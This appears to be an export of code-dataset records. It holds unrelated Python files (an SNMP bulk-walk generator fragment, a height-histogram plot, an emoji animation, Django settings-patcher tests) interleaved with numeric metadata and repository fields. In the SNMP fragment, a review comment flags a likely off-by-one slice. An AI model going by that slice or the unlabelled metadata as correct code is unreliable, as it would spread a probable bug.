            yield errorIndication, errorStatus, errorIndex, \
                varBindTable and varBindTable[0] or []
            # Timeouts are retried on the next iteration; other engine
            # errors end the generator.
            if errorIndication != errind.requestTimedOut:
                return
        elif errorStatus:
            if errorStatus == 2:
                # Hide SNMPv1 noSuchName error which leaks in here
                # from SNMPv1 Agent through internal pysnmp proxy.
                errorStatus = errorStatus.clone(0)
                errorIndex = errorIndex.clone(0)
            yield errorIndication, errorStatus, errorIndex, \
                varBindTable and varBindTable[0] or []
            return
        else:
            for i in range(len(varBindTable)):
                stopFlag = True
                if len(varBindTable[i]) != len(initialVars):
                    # Row is short of columns -- truncate the table and stop.
                    # NOTE(review): the [:i-1] slice also drops the previous
                    # complete row; looks like an off-by-one, but it matches
                    # the pattern used below -- verify against upstream.
                    varBindTable = i and varBindTable[:i-1] or []
                    break
                for j in range(len(varBindTable[i])):
                    name, val = varBindTable[i][j]
                    if nullVarBinds[j]:
                        # Column already finished -- mask with endOfMibView.
                        varBindTable[i][j] = name, endOfMibView
                        continue
                    stopFlag = False
                    if isinstance(val, Null):
                        nullVarBinds[j] = True
                    elif not lexicographicMode and \
                            not initialVars[j].isPrefixOf(name):
                        # Left the requested subtree -- finish this column.
                        varBindTable[i][j] = name, endOfMibView
                        nullVarBinds[j] = True
                if stopFlag:
                    varBindTable = i and varBindTable[:i-1] or []
                    break

            totalRows += len(varBindTable)
            totalCalls += 1

            if maxRows and totalRows >= maxRows:
                if totalRows > maxRows:
                    # Trim rows delivered beyond the maxRows limit.
                    varBindTable = varBindTable[:-(totalRows-maxRows)]
                stopFlag = True
            if maxCalls and totalCalls >= maxCalls:
                stopFlag = True

        # Yield each retrieved row; the caller may send() in a new
        # sequence of varBinds to re-scope the iteration.
        for varBinds in varBindTable:
            initialVarBinds = (yield errorIndication, errorStatus,
                               errorIndex, varBinds)

            if initialVarBinds:
                varBinds = initialVarBinds
                initialVars = [x[0] for x in vbProcessor.makeVarBinds(snmpEngine, varBinds)]
| 38.735
| 138
| 0.615937
| 2,321
| 23,241
| 6.161999
| 0.128824
| 0.016641
| 0.030905
| 0.030206
| 0.874983
| 0.857083
| 0.84212
| 0.828695
| 0.81541
| 0.805901
| 0
| 0.016738
| 0.287939
| 23,241
| 599
| 139
| 38.799666
| 0.847483
| 0.533927
| 0
| 0.754808
| 0
| 0
| 0.057043
| 0.00453
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043269
| false
| 0
| 0.028846
| 0.004808
| 0.105769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7db9761ee09127ca552ff6ad6a83819c07a6feda
| 41
|
py
|
Python
|
basis/trimesh/interfaces/__init__.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 23
|
2021-04-02T09:02:04.000Z
|
2022-03-22T05:31:03.000Z
|
basis/trimesh/interfaces/__init__.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 35
|
2021-04-12T09:41:05.000Z
|
2022-03-26T13:32:46.000Z
|
basis/trimesh/interfaces/__init__.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 16
|
2021-03-30T11:55:45.000Z
|
2022-03-30T07:10:59.000Z
|
from . import scad
from . import blender
| 13.666667
| 21
| 0.756098
| 6
| 41
| 5.166667
| 0.666667
| 0.645161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195122
| 41
| 2
| 22
| 20.5
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
81cb296b65166efb84ac449409d405b98a6c996e
| 2,286
|
py
|
Python
|
math/standard_deviation.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
math/standard_deviation.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
math/standard_deviation.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
from data import nba_data, okcupid_data
# Plot NBA player heights and OkCupid profile heights as two stacked
# histograms, each marked with the mean, +/-1..3 standard deviations
# and your own height.  The two panels previously duplicated ~12 lines
# of plotting code each; the shared logic now lives in one helper.
nba_mean = np.mean(nba_data)
okcupid_mean = np.mean(okcupid_data)

#Change this variable to your height (in inches)!
your_height = 65

nba_standard_deviation = np.std(nba_data)
okcupid_standard_deviation = np.std(okcupid_data)


def _plot_height_panel(position, title, data, mean, standard_deviation):
    """Draw one histogram panel with mean, +/-1..3 SD and 'you' markers.

    position is a 3-digit matplotlib subplot code (e.g. 211); data is the
    height sample; mean/standard_deviation are precomputed from data.
    """
    plt.subplot(position)
    plt.title(title)
    plt.xlabel("Height (inches)")
    plt.hist(data)
    plt.axvline(mean, color='#FD4E40', linestyle='solid', linewidth=2, label="Mean")
    for k in (1, 2, 3):
        # Label only the first SD line so the legend shows a single entry.
        plt.axvline(mean + standard_deviation * k, color='#FFB908',
                    linestyle='solid', linewidth=2,
                    label="Standard Deviations" if k == 1 else None)
        plt.axvline(mean - standard_deviation * k, color='#FFB908',
                    linestyle='solid', linewidth=2)
    plt.axvline(your_height, color='#62EDBF', linestyle='solid', linewidth=2, label="You")
    plt.xlim(55, 90)
    plt.legend()


_plot_height_panel(211, "NBA Player Heights", nba_data,
                   nba_mean, nba_standard_deviation)
_plot_height_panel(212, "OkCupid Profile Heights", okcupid_data,
                   okcupid_mean, okcupid_standard_deviation)
plt.tight_layout()
plt.show()
| 35.169231
| 134
| 0.757655
| 320
| 2,286
| 5.2375
| 0.165625
| 0.095465
| 0.21957
| 0.229117
| 0.778043
| 0.778043
| 0.778043
| 0.736277
| 0.736277
| 0.736277
| 0
| 0.041366
| 0.090551
| 2,286
| 64
| 135
| 35.71875
| 0.764791
| 0.020997
| 0
| 0.210526
| 0
| 0
| 0.140877
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.078947
| 0
| 0.078947
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81d2dc816f6cc2393790151bec57ceda055cc66b
| 1,035
|
py
|
Python
|
9.1 name fire sequence test.py
|
asadava/NameSong
|
133b5ff107940ae7571c53de8a6cf89621f15f6c
|
[
"MIT"
] | null | null | null |
9.1 name fire sequence test.py
|
asadava/NameSong
|
133b5ff107940ae7571c53de8a6cf89621f15f6c
|
[
"MIT"
] | null | null | null |
9.1 name fire sequence test.py
|
asadava/NameSong
|
133b5ff107940ae7571c53de8a6cf89621f15f6c
|
[
"MIT"
] | null | null | null |
import time
print("🏪🛒🛒 ")
time.sleep(.2)
print("🏪🛒🛒 🔥🔥")
time.sleep(.2)
print("🏪🛒🛒🔥🔥")
time.sleep(.2)
print("🏪🛒🔥🔥")
time.sleep(.2)
print("🏪🔥🔥🌫")
time.sleep(.2)
print("🔥🔥🌫🌫")
time.sleep(0.2)
print("🔥🌫🌫🌫")
time.sleep(0.2)
print("🌫🌫🌫🌫")
time.sleep(1)
print("🌫🌫🌫🌫 🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒")
time.sleep(1)
print("🌫🌫🌫🌫 🚒👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒 🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒 🧯👩🚒 🧯👨🚒")
time.sleep(1)
print("🌫🌫🌫🌫 🚒 🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫🧯👩🚒 🧯👨🚒")
time.sleep(1)
print("🌫🌫🌫🌫🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🧯👩🚒 🧯👨🚒")
time.sleep(1)
| 17.844828
| 27
| 0.417391
| 175
| 1,035
| 3.76
| 0.154286
| 0.382979
| 0.319149
| 0.478723
| 0.727964
| 0.463526
| 0.31155
| 0.31155
| 0.31155
| 0.31155
| 0
| 0.034208
| 0.152657
| 1,035
| 58
| 28
| 17.844828
| 0.458381
| 0
| 0
| 0.719298
| 0
| 0
| 0.27477
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.017544
| 0
| 0.017544
| 0.491228
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c48c271670a6f96890a4bcf5c7863664bf8c97b2
| 110
|
py
|
Python
|
telemetry/loggers/__init__.py
|
trevorgrayson/telemetry
|
efeca1b2062f40a2557f2c030dc687f546f3c60b
|
[
"MIT"
] | 3
|
2020-03-20T20:04:37.000Z
|
2021-08-23T20:11:10.000Z
|
telemetry/loggers/__init__.py
|
trevorgrayson/telemetry
|
efeca1b2062f40a2557f2c030dc687f546f3c60b
|
[
"MIT"
] | 2
|
2019-06-10T08:02:05.000Z
|
2019-06-10T08:02:22.000Z
|
telemetry/loggers/__init__.py
|
trevorgrayson/telemetry
|
efeca1b2062f40a2557f2c030dc687f546f3c60b
|
[
"MIT"
] | null | null | null |
from telemetry.clients.pagerduty import PagerDutyTelemeter
from telemetry.clients.slack import SlackTelemeter
| 36.666667
| 58
| 0.890909
| 12
| 110
| 8.166667
| 0.666667
| 0.265306
| 0.408163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 110
| 2
| 59
| 55
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
484c22950d92c4719af57441dbe6aaf1bb31e0cb
| 15,382
|
py
|
Python
|
guitar-package/guitar/tests/patcher_test.py
|
django-stars/guitar
|
9bddfd2d7b555c97dd9470b458a5f43bd805b026
|
[
"MIT"
] | null | null | null |
guitar-package/guitar/tests/patcher_test.py
|
django-stars/guitar
|
9bddfd2d7b555c97dd9470b458a5f43bd805b026
|
[
"MIT"
] | null | null | null |
guitar-package/guitar/tests/patcher_test.py
|
django-stars/guitar
|
9bddfd2d7b555c97dd9470b458a5f43bd805b026
|
[
"MIT"
] | null | null | null |
import unittest
import shutil
import os
from guitar.patcher import Patcher, SettingsPatcher, MiddlewarePatcher, AppsPatcher, UrlsPatcher
class TestPatcher(unittest.TestCase):
    """End-to-end check that Patcher applies a settings patch to a file."""

    settings_py_path = 'tests/settings_py_copy.txt'
    settings_py_expect_path = 'tests/settings_py_expect.txt'

    def setUp(self):
        # Work on a throwaway copy of the settings example.
        shutil.copy2('tests/settings_py.txt', self.settings_py_path)

    def tearDown(self):
        # Drop the throwaway copy.
        os.remove(self.settings_py_path)

    def test_patcher(self):
        patch_spec = {
            'settings': {
                'file_path': self.settings_py_path,
                'patch': {'item_to_add': "FOO='BAR'\nAPP_DATA = {'x': 5, 'y':['1','2','3']}"},
            }
        }
        Patcher().patch(patch_spec)
        with open(self.settings_py_path, 'r') as patched_file:
            patched = patched_file.read()
        with open(self.settings_py_expect_path, 'r') as expected_file:
            expected = expected_file.read()
        self.assertEqual(expected, patched)
class TestPatchSettings(unittest.TestCase):
    """SettingsPatcher appends the patched items at the end of the module."""

    settings_py = """
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
)

ROOT_URLCONF = 'guitar.urls'

WSGI_APPLICATION = 'guitar.wsgi.application'
"""

    # Same content as settings_py plus the two appended settings lines.
    settings_py_after_patch = """
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
)

ROOT_URLCONF = 'guitar.urls'

WSGI_APPLICATION = 'guitar.wsgi.application'
FOO='BAR'
APP_DATA = {'x': 5, 'y':['1','2','3']}
"""

    def test_patch_settings(self):
        patch_spec = {'item_to_add': "FOO='BAR'\nAPP_DATA = {'x': 5, 'y':['1','2','3']}"}
        patched_settings = SettingsPatcher().apply_patch(self.settings_py, patch_spec)
        self.assertEqual(self.settings_py_after_patch, patched_settings)
class TestMiddlewarePatcher(unittest.TestCase):
    """Unit tests for MiddlewarePatcher.apply_patch.

    Each test runs the same MIDDLEWARE_CLASSES fixture through the patcher
    with a different 'before'/'after' placement directive and compares the
    result to a literal expected module. The fixture strings are the test's
    substance and must match byte for byte.
    """

    # Input fixture patched by every test below.
    settings_py = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""

    def test_patch_after(self):
        # Insert the new middleware right after CsrfViewMiddleware.
        settings_py_append_after = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'foo.middleware.bar',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
        patch_obj = {'before': None, 'after': 'django.middleware.csrf.CsrfViewMiddleware', 'item_to_add': 'foo.middleware.bar'}
        new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_after, new_settings_py)

    def test_append_before(self):
        # Insert the new middleware right before CsrfViewMiddleware.
        settings_py_append_before = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'foo.middleware.bar',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
        patch_obj = {'after': None, 'before': 'django.middleware.csrf.CsrfViewMiddleware', 'item_to_add': 'foo.middleware.bar'}
        new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)

    def test_append_first(self):
        # 'before' the first entry puts the new middleware at the head.
        settings_py_append_before = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'foo.middleware.bar',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
        patch_obj = {'after': None, 'before': 'django.middleware.common.CommonMiddleware', 'item_to_add': 'foo.middleware.bar'}
        new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)

    def test_append_last(self):
        # 'after' the last entry — and also neither 'before' nor 'after' set —
        # appends the new middleware at the tail (note the trailing comma the
        # patcher emits there).
        settings_py_append_before = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'foo.middleware.bar',
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
        patch_obj = {'before': None, 'after': 'django.contrib.messages.middleware.MessageMiddleware', 'item_to_add': 'foo.middleware.bar'}
        new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)
        # Default placement (no anchors) must behave like append-last.
        patch_obj = {'before': None, 'after': None, 'item_to_add': 'foo.middleware.bar'}
        new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)
class AppsTestPatcher(unittest.TestCase):
    """Unit tests for AppsPatcher.apply_patch.

    Mirrors TestMiddlewarePatcher but targets the INSTALLED_APPS tuple:
    each test checks one 'before'/'after' placement of a new app entry.
    """

    # Input fixture patched by every test below.
    settings_py = """
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""

    def test_patch_after(self):
        # Insert the new app right after django.contrib.sites.
        settings_py_append_after = """
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'foo.bar',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
        patch_obj = {'before': None, 'after': 'django.contrib.sites', 'item_to_add': 'foo.bar'}
        new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_after, new_settings_py)

    def test_append_before(self):
        # Insert the new app right before django.contrib.sites.
        settings_py_append_before = """
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'foo.bar',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
        patch_obj = {'after': None, 'before': 'django.contrib.sites', 'item_to_add': 'foo.bar'}
        new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)

    def test_append_first(self):
        # 'before' the first entry puts the new app at the head.
        settings_py_append_before = """
INSTALLED_APPS = (
'foo.bar',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
        patch_obj = {'after': None, 'before': 'django.contrib.auth', 'item_to_add': 'foo.bar'}
        new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)

    def test_append_last(self):
        # 'after' the last entry — and also no anchors at all — appends the
        # new app at the tail (with the trailing comma the patcher emits).
        settings_py_append_before = """
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'foo.bar',
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
        patch_obj = {'before': None, 'after': 'django.contrib.admin', 'item_to_add': 'foo.bar'}
        new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)
        # Default placement (no anchors) must behave like append-last.
        patch_obj = {'before': None, 'after': None, 'item_to_add': 'foo.bar'}
        new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)
class UrlsTestPatcher(unittest.TestCase):
    """Unit tests for UrlsPatcher.apply_patch.

    The anchors here are substrings of multi-line url(...) entries (regex
    patterns, view paths, include targets), so the patcher must treat a whole
    url(...) call — not a single line — as the insertion unit.
    """

    # Input fixture patched by every test below.
    urls_py = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(
r'^admin/',
include(admin.site.urls)
),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls'))
)
"""

    def test_patch_after(self):
        # Anchor '^admin/' sits inside a multi-line url(...) entry; the new
        # entry must land after that whole entry.
        settings_py_append_after = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(
r'^admin/',
include(admin.site.urls)
),
url(_(r'^foo/'), include('foo.urls')),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls'))
)
"""
        patch_obj = {'before': None, 'after': '^admin/', 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
        new_urls_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
        self.assertEqual(settings_py_append_after, new_urls_py)

    def test_append_before(self):
        # Anchor is the view path of the favicon entry; insert before it.
        urls_py_append_before = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(
r'^admin/',
include(admin.site.urls)
),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(_(r'^foo/'), include('foo.urls')),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls'))
)
"""
        patch_obj = {'after': None, 'before': 'django.views.generic.simple.redirect_to', 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
        new_settings_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
        self.assertEqual(urls_py_append_before, new_settings_py)

    def test_append_first(self):
        # 'before' the first url(...) entry puts the new entry at the head.
        settings_py_append_before = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(_(r'^foo/'), include('foo.urls')),
url(
r'^admin/',
include(admin.site.urls)
),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls'))
)
"""
        patch_obj = {'after': None, 'before': 'admin.site.urls', 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
        new_settings_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)

    def test_append_last(self):
        # 'after' the last entry — and also no anchors at all — appends the
        # new entry at the tail (with the trailing comma the patcher emits).
        settings_py_append_before = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(
r'^admin/',
include(admin.site.urls)
),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls')),
url(_(r'^foo/'), include('foo.urls')),
)
"""
        patch_obj = {'before': None, 'after': 'django.contrib.auth.urls', 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
        new_settings_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)
        # Default placement (no anchors) must behave like append-last.
        patch_obj = {'before': None, 'after': None, 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
        new_settings_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
        self.assertEqual(settings_py_append_before, new_settings_py)
| 33.150862
| 144
| 0.690482
| 1,756
| 15,382
| 5.823462
| 0.071185
| 0.104244
| 0.038138
| 0.040876
| 0.912674
| 0.894778
| 0.887542
| 0.879718
| 0.875122
| 0.866419
| 0
| 0.001003
| 0.157197
| 15,382
| 463
| 145
| 33.222462
| 0.787797
| 0.002926
| 0
| 0.778947
| 0
| 0
| 0.658211
| 0.392005
| 0
| 0
| 0
| 0
| 0.044737
| 1
| 0.042105
| false
| 0
| 0.036842
| 0
| 0.110526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4851095d0bf0da7ca3630d8d44a7884f95b46325
| 34,846
|
py
|
Python
|
src/pyrad_proc/pyrad/flow/flow_control.py
|
MeteoSwiss/pyrad
|
f733179075fdf3fcff475a5af8b6b71e9ac4379d
|
[
"BSD-3-Clause"
] | 9
|
2021-02-22T15:34:37.000Z
|
2022-03-29T13:16:25.000Z
|
src/pyrad_proc/pyrad/flow/flow_control.py
|
MeteoSwiss/pyrad
|
f733179075fdf3fcff475a5af8b6b71e9ac4379d
|
[
"BSD-3-Clause"
] | 15
|
2021-02-08T10:16:41.000Z
|
2022-03-31T09:26:26.000Z
|
src/pyrad_proc/pyrad/flow/flow_control.py
|
MeteoSwiss/pyrad
|
f733179075fdf3fcff475a5af8b6b71e9ac4379d
|
[
